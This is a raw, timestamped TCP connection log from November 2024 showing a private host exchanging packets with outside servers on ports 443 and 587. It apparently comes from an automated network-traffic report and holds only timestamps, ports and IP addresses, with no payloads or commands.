                                                                                                              Nov 12, 2024 15:55:03.464445114 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.464845896 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.464860916 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.464909077 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.464920044 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.464953899 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.465239048 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.465254068 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.465298891 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.465306997 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.465342045 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.466202974 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.466227055 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.466270924 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.466281891 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.466320038 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.466552973 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.466567039 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.466608047 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.466615915 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.466650009 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.470180035 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.470206022 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.470247984 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.470263958 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.470278978 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.470298052 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.470535994 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.470550060 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.470594883 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.470604897 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.470638990 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.470988989 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.471003056 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.471035957 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.471046925 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.471062899 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.471079111 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.471345901 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.471363068 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.471400023 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.471409082 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.471440077 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.471456051 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.471805096 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.471820116 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.471867085 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.471874952 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.471910000 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.472253084 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.472266912 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.472313881 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.472321987 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.472357988 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.472496986 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.472512960 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.472552061 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.472558022 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.472599983 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.473006964 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.473021030 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.473071098 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.473078966 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.473113060 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.473170042 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.473184109 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.473226070 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.473232985 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.473262072 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.473714113 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.473728895 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.473773956 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.473781109 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.473814011 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.474170923 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.474184990 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.474217892 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.474225044 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.474258900 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.476116896 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.476133108 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.476176023 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.476190090 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.476224899 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.476233006 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.476247072 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.476281881 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.476289034 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.476320028 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.476366997 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.476382971 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.476408005 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.476413965 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.476428986 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.476443052 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.476448059 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.476459026 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.476490974 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.476490021 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.476501942 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.476531982 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.476556063 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.476568937 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.476618052 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.476624966 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.476659060 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.476938009 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.476952076 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.476994038 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.477001905 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.477035046 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.477382898 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.477397919 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.477432966 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.477440119 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.477475882 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.478013992 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.478033066 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.478075981 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.478089094 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.478125095 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.478213072 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.478226900 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.478274107 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.478281021 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.478317976 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.478650093 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.478671074 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.478696108 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.478705883 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.478719950 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.478733063 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.578474998 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.578505039 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.578583002 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.578612089 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.578634024 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.578655958 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.578741074 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.578762054 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.578811884 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.578819990 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.578862906 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.580391884 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.580410004 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.580471039 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.580481052 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.580518961 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.580817938 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.580832005 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.580882072 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.580892086 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.580930948 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.581734896 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.581749916 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.581820965 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.581830025 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.581871033 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.581880093 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.581928015 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.581934929 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.581954956 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.581974983 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.582003117 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.584209919 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.584224939 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:03.584237099 CET49710443192.168.2.6198.252.105.91
                                                                                                              Nov 12, 2024 15:55:03.584243059 CET44349710198.252.105.91192.168.2.6
                                                                                                              Nov 12, 2024 15:55:09.856647015 CET49712443192.168.2.6104.26.13.205
                                                                                                              Nov 12, 2024 15:55:09.856700897 CET44349712104.26.13.205192.168.2.6
                                                                                                              Nov 12, 2024 15:55:09.856776953 CET49712443192.168.2.6104.26.13.205
                                                                                                              Nov 12, 2024 15:55:09.869324923 CET49712443192.168.2.6104.26.13.205
                                                                                                              Nov 12, 2024 15:55:09.869349003 CET44349712104.26.13.205192.168.2.6
                                                                                                              Nov 12, 2024 15:55:10.493155956 CET44349712104.26.13.205192.168.2.6
                                                                                                              Nov 12, 2024 15:55:10.493240118 CET49712443192.168.2.6104.26.13.205
                                                                                                              Nov 12, 2024 15:55:10.495325089 CET49712443192.168.2.6104.26.13.205
                                                                                                              Nov 12, 2024 15:55:10.495331049 CET44349712104.26.13.205192.168.2.6
                                                                                                              Nov 12, 2024 15:55:10.495564938 CET44349712104.26.13.205192.168.2.6
                                                                                                              Nov 12, 2024 15:55:10.570662022 CET49712443192.168.2.6104.26.13.205
                                                                                                              Nov 12, 2024 15:55:10.615330935 CET44349712104.26.13.205192.168.2.6
                                                                                                              Nov 12, 2024 15:55:10.757848024 CET44349712104.26.13.205192.168.2.6
                                                                                                              Nov 12, 2024 15:55:10.757951975 CET44349712104.26.13.205192.168.2.6
                                                                                                              Nov 12, 2024 15:55:10.758063078 CET49712443192.168.2.6104.26.13.205
                                                                                                              Nov 12, 2024 15:55:10.764672995 CET49712443192.168.2.6104.26.13.205
                                                                                                              Nov 12, 2024 15:55:12.932401896 CET49714587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:12.937390089 CET5874971451.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:12.937474966 CET49714587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:14.193897009 CET5874971451.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:14.194489002 CET5874971451.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:14.194719076 CET5874971451.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:14.194804907 CET49714587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:14.194806099 CET49714587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:14.322037935 CET49714587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:14.326778889 CET5874971451.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:14.566231012 CET5874971451.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:14.566481113 CET49714587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:14.571322918 CET5874971451.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:14.810122013 CET5874971451.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:14.810873985 CET49714587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:14.815681934 CET5874971451.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:15.942565918 CET5874971451.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:15.942579985 CET5874971451.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:15.942599058 CET5874971451.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:15.942609072 CET5874971451.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:15.942645073 CET49714587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:15.942672014 CET49714587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:15.942851067 CET5874971451.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:15.942930937 CET49714587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:15.943298101 CET5874971451.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:15.943346977 CET49714587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:15.944103003 CET5874971451.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:15.947734118 CET49714587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:15.976074934 CET49714587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:15.980865002 CET5874971451.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:16.241117001 CET5874971451.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:16.244034052 CET49714587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:16.248933077 CET5874971451.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:16.488195896 CET5874971451.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:16.489393950 CET49714587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:16.494230032 CET5874971451.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:16.733599901 CET5874971451.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:16.735167980 CET49714587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:16.740210056 CET5874971451.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:16.981914997 CET5874971451.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:16.994630098 CET49714587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:16.999541998 CET5874971451.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:18.145656109 CET5874971451.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:18.145931005 CET49714587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:18.146645069 CET5874971451.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:18.146694899 CET49714587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:18.147558928 CET5874971451.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:18.147609949 CET49714587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:18.149364948 CET5874971451.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:18.149425030 CET49714587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:18.154489994 CET5874971451.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:18.398766994 CET5874971451.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:18.398996115 CET49714587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:18.403922081 CET5874971451.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:18.642307997 CET5874971451.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:18.642998934 CET49714587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:18.643075943 CET49714587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:18.643099070 CET49714587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:18.643106937 CET49714587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:18.647840023 CET5874971451.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:18.647897005 CET5874971451.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:18.648047924 CET5874971451.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:18.648124933 CET5874971451.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:18.888581038 CET5874971451.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:18.937205076 CET49714587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:18.942137003 CET5874971451.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:19.180756092 CET5874971451.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:19.181247950 CET49714587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:19.182416916 CET49729587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:19.189181089 CET5874972951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:19.189291954 CET49729587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:20.072123051 CET5874972951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:20.072320938 CET49729587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:20.077181101 CET5874972951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:20.314228058 CET5874972951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:20.314373016 CET49729587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:20.320074081 CET5874972951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:20.556962013 CET5874972951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:20.557389975 CET49729587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:20.562305927 CET5874972951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:20.804640055 CET5874972951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:20.804709911 CET5874972951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:20.804723978 CET5874972951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:20.804769993 CET49729587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:20.804830074 CET5874972951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:20.804872990 CET49729587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:20.807025909 CET49729587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:20.811877966 CET5874972951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:21.047844887 CET5874972951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:21.049273014 CET49729587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:21.054141045 CET5874972951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:21.292372942 CET5874972951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:21.292622089 CET49729587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:21.297497988 CET5874972951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:21.533530951 CET5874972951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:21.533927917 CET49729587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:21.538667917 CET5874972951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:21.783719063 CET5874972951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:21.784024000 CET49729587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:21.788903952 CET5874972951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:22.025088072 CET5874972951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:22.025316000 CET49729587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:22.030168056 CET5874972951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:22.272047997 CET5874972951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:22.345194101 CET49729587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:22.350236893 CET5874972951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:22.586268902 CET5874972951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:22.614423037 CET49729587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:22.619333029 CET49729587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:22.619359970 CET49729587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:22.619502068 CET49729587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:22.619537115 CET5874972951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:22.619549036 CET49729587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:22.619587898 CET49729587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:22.619625092 CET49729587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:22.619656086 CET49729587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:22.619678020 CET49729587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:22.619700909 CET49729587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:22.624244928 CET5874972951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:22.624304056 CET5874972951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:22.624383926 CET5874972951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:22.624649048 CET5874972951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:22.624761105 CET5874972951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:22.624773026 CET5874972951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:22.624782085 CET5874972951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:22.624792099 CET5874972951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:22.624803066 CET5874972951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:22.863289118 CET5874972951.195.88.199192.168.2.6
                                                                                                              Nov 12, 2024 15:55:22.934919119 CET49729587192.168.2.651.195.88.199
                                                                                                              Nov 12, 2024 15:55:24.458406925 CET49750443192.168.2.6104.26.13.205
                                                                                                              Nov 12, 2024 15:55:24.458452940 CET44349750104.26.13.205192.168.2.6
                                                                                                              Nov 12, 2024 15:55:24.458519936 CET49750443192.168.2.6104.26.13.205
                                                                                                              Nov 12, 2024 15:55:24.464037895 CET49750443192.168.2.6104.26.13.205
                                                                                                              Nov 12, 2024 15:55:24.464056969 CET44349750104.26.13.205192.168.2.6
                                                                                                              Nov 12, 2024 15:55:25.258611917 CET44349750104.26.13.205192.168.2.6
                                                                                                              Nov 12, 2024 15:55:25.258797884 CET49750443192.168.2.6104.26.13.205
